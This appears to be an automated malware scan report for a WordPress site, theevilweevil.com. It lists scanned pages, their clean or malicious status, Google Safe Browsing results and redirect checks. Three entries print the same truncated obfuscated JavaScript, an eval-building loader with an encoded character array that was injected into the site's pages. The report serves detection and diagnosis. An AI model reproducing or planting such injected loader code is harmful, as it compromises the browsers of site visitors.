Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theevilweevil.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://theevilweevil.com/ | 200 OK Content-Length: 30334 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122 Antivirus reports:
| ||
http://theevilweevil.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://theevilweevil.com/wp-content/plugins/sharebar/js/sharebar.js?ver=3.5 | 200 OK Content-Length: 1802 Content-Type: application/javascript | clean |
http://theevilweevil.com/wp-content/themes/OptimizePress/js/js_cookie.js?ver=1.0 | 200 OK Content-Length: 636 Content-Type: application/javascript | clean |
http://theevilweevil.com/?ver=pprjq1 | 200 OK Content-Length: 2814 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122 Antivirus reports:
| ||
http://theevilweevil.com/test404page.js | 200 OK Content-Length: 9058 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122 Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://theevilweevil.com/wp-content/themes/OptimizePress/js/cufon-yui.js | 200 OK Content-Length: 39451 Content-Type: application/javascript | clean |
http://theevilweevil.com/wp-content/themes/OptimizePress/js/qtobject.js | 200 OK Content-Length: 2354 Content-Type: application/javascript | clean |
http://theevilweevil.com/wp-content/themes/OptimizePress/js/combinebottom.js | 200 OK Content-Length: 291006 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: theevilweevil.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 00:47:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: __utmfr=228; expires=Fri, 02-Jan-2015 00:47:36 GMT; path=/
GET / HTTP/1.1
Host: theevilweevil.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 00:47:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: __utmfr=228; expires=Fri, 02-Jan-2015 00:47:36 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: theevilweevil.com
Referer: http://www.google.com/search?q=theevilweevil.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: theevilweevil.com
Referer: http://www.google.com/search?q=theevilweevil.com
Result:
The result is similar to the first query. There are no suspicious redirects found.